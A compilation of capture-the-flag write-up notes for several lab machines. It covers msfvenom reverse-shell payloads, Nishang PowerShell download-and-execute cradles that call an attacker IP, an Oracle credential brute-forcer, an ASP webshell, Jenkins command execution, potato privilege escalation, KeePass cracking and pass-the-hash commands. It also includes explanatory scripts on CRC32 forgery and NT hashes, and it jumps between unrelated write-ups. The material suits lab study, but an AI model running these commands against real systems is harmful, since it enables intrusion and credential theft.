For changing the shellcode (bad characters excluded with -b, output as a Python variable):
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Invoke-PowerShellTcp: copy this file from /opt/nishang/shells to the /smb directory (the directory served to the target).
Append this line to the end of the file, so that not only does the module load, but the shell function is then called to give me a callback:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443
Run this command on the webshell (with a listener on 443 first); the target fetches the script from the attacker's Python web server and hands a PowerShell shell back to the attacker machine:
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')
I can also see that the website is running IIS 7.5, which is the default IIS for Windows 7 / Server 2008r2. I’ll also see the webserver is hosting Drupal 7.
Notice that port 80 - Microsoft IIS httpd 8.5 is open. Just note it down, it will be useful later on. Let's focus on port 1521 (and sort of port 49160) instead - Oracle TNS listener 11.2.0.2.0 (unauthorized). Doing some enumeration I find out that this particular version of the Oracle listener is vulnerable to remote TNS poisoning.
Exploitation: creating your own privileged users
sqlplus scott/tiger@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=10.10.10.82)(Port=1521))(CONNECT_DATA=(SID=XE))) AS SYSDBA
CREATE USER v3ded IDENTIFIED BY v3ded99;
GRANT dba TO v3ded;
Directory hunting:
gobuster -u http://10.10.10.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html -t 30
Oracle DB - port 1521 open: we need the odat tool set up.
1 - Identify SIDs
odat sidguesser -s 10.10.10.82
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
So at this point we have four potential SIDs: 'XE', 'XEXDB', 'PLSExtProc', and 'CLRExtProc'.
3 - Guess / bruteforce user and pass
So I wrote a brute force script in Python, using a process pool, which can go pretty quick:

#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool

MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"


def usage():
    print("{} [ip] [wordlist]".format(sys.argv[0]))
    print("  wordlist should be of the format [username]:[password]")
    sys.exit(1)


def scan(userpass):
    # one worker per username:password line; reports whether the login worked
    u, p = userpass.split(':')[:2]
    try:
        conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
        conn.close()
        return u, p, True
    except cx_Oracle.DatabaseError:
        return u, p, False


def main(host, userpassfile, nprocs=MAX_PROC):
    with open(userpassfile, 'r') as f:
        userpass = f.read().rstrip().replace('\r', '').split('\n')
    pool = Pool(processes=nprocs)
    for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
        if status:
            print("[+] Valid credentials: {}:{}".format(username, pass_))


if __name__ == '__main__':
    if len(sys.argv) != 3:
        usage()
    host = sys.argv[1]
    main(host, sys.argv[2])
select * from user_role_privs;
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
Similarly with odat, running the all scan shows nothing that can be done, but passing in the --sysdba flag changes all of that:
odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\inetpub\wwwroot 0xdf.txt <(echo 0xdf was here)
SeChangeNotifyPrivilege   Bypass traverse checking                   Enabled
SeImpersonatePrivilege    Impersonate a client after authentication  Enabled
SeCreateGlobalPrivilege   Create global objects                      Enabled
This means that we can likely use RottenPotato (or LonelyPotato).
First, we'll upload two files to the server: MSFRottenPotato.exe and rev.bat. The exe is from Decoder's GitHub page for LonelyPotato. The second is a simple PowerShell command to get a shell:
Bounty was one of the easier boxes I’ve done on HTB, but it still showcased a neat trick for initial access that involved embedding ASP code in a web.config file that wasn’t subject to file extension filtering. Initial shell provides access as an unprivileged user on a relatively unpatched host, vulnerable to several kernel exploits, as well as a token privilege attack. I’ll show a handful of ways to enumerate and to escalate privilege, including a really neat new tool, Watson. When I first wrote this post, Watson wouldn’t run on Bounty, but thanks to some quick work from Rasta Mouse and Mark S, I was able to update the post to include it.
nmap -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.93
Only port 80 is open.
/transfer.aspx presents a simple form with “Browse…” and “Upload” buttons:
Bypassing Upload Extension Filter
I'll grab a copy of the aspx shell that comes with Kali, and try to upload it. On the first attempt to upload, the page rejects it:
I can bypass the filter by adding a null byte after the .aspx so that the app thinks it's a .jpg, but then saves it as an .aspx:
Prep
It's certainly possible to get a webshell, but I'll notice that the UploadedFiles path is being cleared out every few minutes. So I'll opt to go directly to a reverse shell. First, grab a copy of Nishang's Invoke-PowerShellTcp.ps1. Then add a line at the end to invoke a callback to me:
Visit http://10.10.10.93/UploadedFiles/web.config, which runs the asp code, which invokes PowerShell to download the Nishang shell, and then run it creating a connection back to me:
user.txt
Now with a shell, I can grab user.txt. Strangely, it's not present when I look for it. It turns out that the file is there, it's just hidden.
If I re-run Get-ChildItem (or gci or ls) with the -Force flag, it shows up:
gci -force
Privesc: merlin --> SYSTEM
Enumeration
I've got a bunch of different methods here, but if you're only going to read one, jump ahead to Watson, as it's brand new, and my favorite.
System Info
systeminfo
whoami /priv
Whenever I get access via a web service on a Windows host, I always check whoami /priv. If SeImpersonatePrivilege is present, I can likely get SYSTEM with Lonely Potato. That appears to be the case here:
SeImpersonatePrivilege    Impersonate a client after authentication  Enabled
Sherlock
Another tool to try is Sherlock. Unfortunately, it's no longer being maintained, in favor of Watson (see more on that later).
Still, it's a quick PowerShell script that will identify some kernel exploits. Upload it, and then run Find-AllVulns.
It looks like MS10-092 is a good candidate:
Watson: check which .NET Framework version is on the target, so Watson can be built against a matching one:
\windows\microsoft.net\framework\v2.0.50727\msbuild -version
So build again with .NET Framework 2.0, copy the resulting Watson.exe over to Bounty, and run it on the machine.
Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
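Why a CRC32 "integrity check" like the one described above gives no protection against tampering: CRC32 is linear, so after modifying a file you can append four chosen bytes that drive the checksum back to any target value. The script below is an added example, not code from the original page, from Watson or from the MS10-092 exploit; it uses only the standard library, and the task-file contents in it are constructed stand-ins, not a real task definition.

```python
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial (the one zlib uses)


def _make_table():
    """Byte-wise lookup table for the reflected CRC-32."""
    table = []
    for i in range(256):
        reg = i
        for _ in range(8):
            reg = (reg >> 1) ^ POLY if reg & 1 else reg >> 1
        table.append(reg)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte, so the top byte of a register
# value uniquely identifies which entry produced it. Checked at import time.
TOP_BYTE_TO_INDEX = {entry >> 24: idx for idx, entry in enumerate(TABLE)}
assert len(TOP_BYTE_TO_INDEX) == 256


def crc32(data: bytes) -> int:
    """Standard CRC-32 as a non-negative 32-bit integer."""
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_crc32(data: bytes, target: int) -> bytes:
    """Return 4 bytes p such that crc32(data + p) == target."""
    # zlib's result is the shift register XORed with 0xFFFFFFFF; undo that to
    # get the raw register after `data`, and the register we must end in.
    reg = crc32(data) ^ 0xFFFFFFFF
    want = target ^ 0xFFFFFFFF

    # Walk backwards from the desired final register. One byte step is
    # reg' = (reg >> 8) ^ TABLE[(reg ^ b) & 0xFF]; the top byte of reg' comes
    # only from the table entry, so each step pins down one table index.
    indices = []
    for _ in range(4):
        idx = TOP_BYTE_TO_INDEX[want >> 24]
        indices.append(idx)
        want = ((want ^ TABLE[idx]) << 8) & 0xFFFFFFFF
    indices.reverse()

    # Walk forwards from the real register, picking each byte so that
    # (reg ^ b) & 0xFF lands on the required table index.
    patch = bytearray()
    for idx in indices:
        patch.append((reg ^ idx) & 0xFF)
        reg = (reg >> 8) ^ TABLE[idx]
    return bytes(patch)


def tamper_keeping_crc(original: bytes, modified: bytes) -> bytes:
    """`modified` plus 4 bytes so that its CRC32 equals CRC32(original)."""
    return modified + forge_crc32(modified, crc32(original))


if __name__ == "__main__":
    # Constructed stand-ins for a task definition before and after tampering.
    original = b"<Exec><Command>C:\\Tools\\backup.exe</Command></Exec>"
    modified = b"<Exec><Command>C:\\Users\\Public\\evil.exe</Command></Exec>"
    forged = tamper_keeping_crc(original, modified)
    print("original CRC32: %08x" % crc32(original))
    print("forged   CRC32: %08x" % crc32(forged))
    print("trailing bytes:", forged[-4:].hex())
```

The four appended bytes are the whole trick: a CRC detects accidental corruption, never a deliberate edit. Any format that needs tamper detection has to use a MAC or a signature keyed with something the writer of the file does not hold.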
use post/multi/recon/local_exploit_suggester
Now get and run the PowerShell launcher from my Nishang shell:
iex(new-object net.webclient).downloadstring('http://10.10.14.5/met-445.ps1')
ASP webshell snippet (runs a command through WScript.Shell and returns its stdout):
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objShell.exec(theCommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
End Function
%>
msfvenom: payload generator & encoder.
-p windows/x64/meterpreter/reverse_tcp: sets the payload to an x64 meterpreter reverse shell.
LHOST=10.10.14.251: sets the "listening" host to our own IP.
LPORT=4321: sets the "listening" port to a port of our choice.
-f exe: sets the payload output format to exe.
-a x64: specifies the system architecture as x64.
-o payload.exe: sets the output payload name to "payload.exe".
--platform windows: specifies the victim's platform as Windows (not necessary, as this is automatically inferred from the payload AFAIK).
Manually enumerate users by RID cycling with rpcclient (known domain SID plus RIDs 1000-1050, dropping SIDs that do not resolve):
for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' 10.10.10.149 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done
grep flags:
-a - Process a binary file as if it were text.
-o - Print only the matched (non-empty) parts of a matching line.
-E - Interpret PATTERNS as extended regular expressions.
Enumerating Users –> Shell as Chase –> User Flag So far we have hazard and rout3r as potential usernames and stealth1agent, [email protected], Q4)sJu\Y8qz*A3?d as potential passwords.
smbclient --list //heist.htb/ -U 'hazard'
Impacket to enumerate other users (same RID cycling, automated):
/opt/impacket/examples/lookupsid.py hazard:stealth1agent@10.10.10.149
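The logic behind both the rpcclient loop and lookupsid.py above is RID cycling: take the domain SID, append each RID in a range, ask the host to resolve it, and keep what resolves. The script below is an added example, not code from the original page, rpcclient or Impacket; it builds the candidate SIDs and parses lookupsids-style output into usable account names. The sample output in it is constructed to mimic rpcclient's format; the host and account names are made up, and only the domain SID is the one on the page.

```python
import re
from typing import Iterator, List, NamedTuple, Optional

DOMAIN_SID = "S-1-5-21-4254423774-1266059056-3197185112"

# SID_NAME_USE values that lookupsids prints in parentheses after the name
SID_TYPES = {1: "User", 2: "Group", 3: "Domain", 4: "Alias",
             5: "WellKnownGroup", 6: "DeletedAccount", 7: "Invalid", 8: "Unknown"}

# "<domain sid>-<rid> <DOMAIN\name> (<type>)"
_LINE_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+(.+?)\s+\((\d+)\)\s*$")


class SidEntry(NamedTuple):
    rid: int
    account: str      # e.g. EXAMPLEHOST\Administrator
    sid_type: str


def candidate_sids(domain_sid: str, start: int, end: int) -> Iterator[str]:
    """Yield one SID per RID in [start, end], exactly what the shell loop feeds to lookupsids."""
    for rid in range(start, end + 1):
        yield "%s-%d" % (domain_sid, rid)


def parse_lookupsids_line(line: str) -> Optional[SidEntry]:
    """Parse one lookupsids output line; None if the line is not in that format."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    _domain, rid, account, type_code = m.groups()
    sid_type = SID_TYPES.get(int(type_code), "Type%s" % type_code)
    return SidEntry(int(rid), account, sid_type)


def resolved_accounts(output: str) -> List[SidEntry]:
    """All parsed entries except unresolved SIDs (the ones grep -v unknown drops)."""
    entries = []
    for line in output.splitlines():
        entry = parse_lookupsids_line(line)
        if entry is None or entry.sid_type == "Unknown" or "*unknown*" in entry.account:
            continue
        entries.append(entry)
    return entries


def usernames(entries: List[SidEntry]) -> List[str]:
    """Keep user accounts only and strip the DOMAIN\\ prefix, giving a spray list."""
    return [e.account.split("\\", 1)[-1] for e in entries if e.sid_type == "User"]


# Constructed sample of what the loop's lookupsids calls return (names made up).
SAMPLE_OUTPUT = """\
S-1-5-21-4254423774-1266059056-3197185112-500 EXAMPLEHOST\\Administrator (1)
S-1-5-21-4254423774-1266059056-3197185112-501 EXAMPLEHOST\\Guest (1)
S-1-5-21-4254423774-1266059056-3197185112-513 EXAMPLEHOST\\None (2)
S-1-5-21-4254423774-1266059056-3197185112-1000 *unknown*\\*unknown* (8)
S-1-5-21-4254423774-1266059056-3197185112-1008 EXAMPLEHOST\\hazard (1)
S-1-5-21-4254423774-1266059056-3197185112-1009 *unknown*\\*unknown* (8)
"""

if __name__ == "__main__":
    print("first SIDs to query:", list(candidate_sids(DOMAIN_SID, 1000, 1002)))
    found = resolved_accounts(SAMPLE_OUTPUT)
    for e in found:
        print("%5d  %-32s %s" % (e.rid, e.account, e.sid_type))
    print("spray list:", usernames(found))
```

Groups (type 2) and aliases (type 4) are kept in the parsed list because they are useful enumeration output, but only type 1 entries go into the spray list; RIDs 500 and 501 are the built-in Administrator and Guest, so a range that starts at 1000 as the loop above does misses them unless queried separately.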
Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d:
Whenever I encounter an application error message that looks fairly unique, I always copy & paste the error message into Google and see what happens. This technique is very underrated; google that shit.
Powered by Jetty 9.4
We are seeing quite a few results for Jenkins, so there is a high probability that this server is running Jenkins as a service, and now we just have to discover it.
Dirbuster
Next step is to dirbuster everything to discover the Jenkins dashboard path. I always use directory-list-2.3-medium.txt, which comes by default in Kali, for most HTB boxes.
It looks like /askjeeves/ is the correct path for the Jenkins main dashboard, confirming our suspicion that Jenkins is the running service.
Exploiting Jenkins
Method 1: Jenkins Script Console
Jenkins has a scripting console, which you can access by going to Manage Jenkins => Script Console
You can write scripts in the Groovy scripting language. I searched for "groovy script run command example", or if you just want to skip straight to the shell, search "groovy script reverse shell".
Testing to see if we have code execution (whoami is just the test command here):
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
From my search of groovy script reverse shell, I came across this Github gist – change the host and port parameter to match your settings, and hit “Run” in the script console & you will get a reverse shell.
Method 2: Jenkins Build Job
With Jenkins you can execute system commands as part of a deployment build job. The Jenkins server allowed anyone to do anything, even the anonymous user, which means we can create a malicious deployment and execute our code.
Steps:
1. Create a new Build Job (http://10.10.10.63:50000/askjeeves/view/all/newJob)
2. Select "FreeStyle Project"
3. Hit OK
4. Select "Build Environment"
5. Generate a payload / put the code you want to execute as a build step
6. Hit Apply
7. Start Build
You can run any system commands you want in the pre-deployment step; I used a msfvenom payload just to validate that it's possible.
It looks like this machine is vulnerable to a few LPE exploits, the big ones being MS16-075 (RottenPotato) and MS16-032. From our sysinfo output we can rule out MS16-032 because that particular exploit requires two CPUs, and this machine has only one.
It looks like this machine is vulnerable to MS16-075 (which I would say is fairly reliable when available), and from our earlier whoami /all command it seems we have everything in place to successfully execute this exploit.
MS16-075 - Windows SMB server
MS16-032 - Security update for Secondary Logon to address elevation of privilege
Method 1: MS16-075 "RottenPotato"
The steps to successfully exploit MS16-075 "rotten potato" (with meterpreter) are:
1. Have a meterpreter shell
2. Upload the RottenPotato/potato exploit executable
3. Load incognito in the meterpreter session
4. Execute the rottenpotato executable
5. Impersonate the NT AUTHORITY\SYSTEM token
6. You are now SYSTEM.
Powershell 1-liner for download + executing file (getting meterpreter shell):
If you search through the user kohsuke's Documents directory you will discover a file called CEH.kdbx. Normally the .kdbx file extension is associated with the KeePass Password Safe. If we can crack the password on this vault file, we will likely find credentials, potentially for the local administrator account.
Downloading the KeePass database file with meterpreter:
download CEH.kdbx
Verifying the downloaded file:
file CEH.kdbx
Before we can crack CEH.kdbx we need to convert it to a format that either john or hashcat can understand. We can use the tool keepass2john (comes preinstalled on Kali) to do this, saving the output to the file john will read:
keepass2john CEH.kdbx > CEH.hash
Cracking the hash & getting the password of the vault with john:
john --wordlist=/usr/share/wordlists/rockyou.txt CEH.hash
Here are the contents that were contained in the KeePass database file.
We have a few passwords and a hash, aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00, which happens to be an NTLM hash in LM:NT form (the first half is the constant empty LM hash, meaning LM storage is disabled; the second half is the NT hash). The SMB service (port 445) is exposed on this server, so we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.
crackmapexec smb ip -u Administrator -p ceh_db_passwords.txt --lusers
crackmapexec smb ip -u administrator -H ceh_db_hash.txt --lusers
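Before spraying the KeePass passwords over SMB, the same check can be done offline: the NT half of the dumped hash is MD4 over the UTF-16LE encoding of the password, so hashing each candidate and comparing tells you immediately whether one of them is the administrator password, without touching the target. The script below is an added example, not code from the original page, CrackMapExec or KeePass. MD4 is implemented here rather than taken from hashlib because OpenSSL 3 builds often do not expose it. The candidate password list standing in for ceh_db_passwords.txt is constructed, so the script simply reports whether any of those candidates matches the dumped hash.

```python
import struct
from typing import List, Optional, Tuple

EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, pure Python."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # (round function, additive constant, shift amounts, message-word order)
    rounds = (
        (f, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (g, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for func, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + func(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash: MD4 of the UTF-16LE password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_hash(blob: str) -> Tuple[str, str]:
    """Split an LM:NT string, checking that both halves are 32 hex characters."""
    lm, nt = blob.strip().lower().split(":")
    for part in (lm, nt):
        if len(part) != 32 or any(ch not in "0123456789abcdef" for ch in part):
            raise ValueError("malformed hash half: %r" % part)
    return lm, nt


def lm_disabled(lm: str) -> bool:
    """True when the LM half is the empty-LM constant (no LM hash stored)."""
    return lm.lower() == EMPTY_LM_HASH


def match_nt_hash(nt: str, candidates: List[str]) -> Optional[str]:
    """First candidate whose NT hash equals `nt`, or None."""
    nt = nt.lower()
    for pw in candidates:
        if nt_hash(pw) == nt:
            return pw
    return None


if __name__ == "__main__":
    dumped = "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00"  # from the KeePass DB
    lm, nt = parse_pwdump_hash(dumped)
    print("LM storage disabled:", lm_disabled(lm))
    candidates = ["Welcome1", "Summer2017!", "P@ssw0rd"]  # constructed stand-in for ceh_db_passwords.txt
    print("offline match against the NT hash:", match_nt_hash(nt, candidates))
```

A match means the spray is unnecessary and you already have the cleartext; no match means the NT hash belongs to a password that is not in the vault, and pass-the-hash (the -H form of crackmapexec, or psexec with the LM:NT pair) is the way in. The LM half being aad3b435b51404eeaad3b435b51404ee is worth recognising on sight: it carries no information about the password at all.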
Shell with Metasploit PSEXEC Module & Hash
With a valid hash of the administrator account, we can perform a pass-the-hash attack and compromise the machine. I chose to use Metasploit for this, but there are plenty of tools which do the same thing as this module.
Getting a SYSTEM shell with msf psexec:
use exploit/windows/smb/psexec
exploit (done with the hash in place of a password)
Getting the "Hidden" root.txt
dir /a
dir /R
That hm.txt:root.txt:$DATA means that the file root.txt is inside an alternate data stream of hm.txt.
You can see the contents of an ADS a few different ways, but the simplest way in my opinion is using the more command on Windows:
more < hm.txt:root.txt
Second blog writeup
search -f *.kdbx (meterpreter: locate the KeePass database)
exploit/windows/smb/psexec
I chose to use the simple pth-winexe program, shown below. Metasploit's exploit/windows/smb/psexec module is also an option.
john --format="keepass" --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
pth-winexe -U ./Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
KeePass password manager
Doing a bit of roaming around the file system, I find an interesting .kdbx file. This file extension is associated with the KeePass password manager. The mentioned .kdbx file can be found at C:\Users\kohsuke\Documents\CEH.kdbx. To transfer this file to our computer I first put the netcat binary (in Kali: /usr/share/windows-binaries/nc.exe) onto the Windows system via PowerShell:
powershell -c 'Invoke-WebRequest "http://IP/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"'
Note: don't forget to start a web server before you actually try to download a file.
Thanks to netcat, we are able to transfer the .kdbx file to our filesystem. We can then proceed to generate a hash with keepass2john.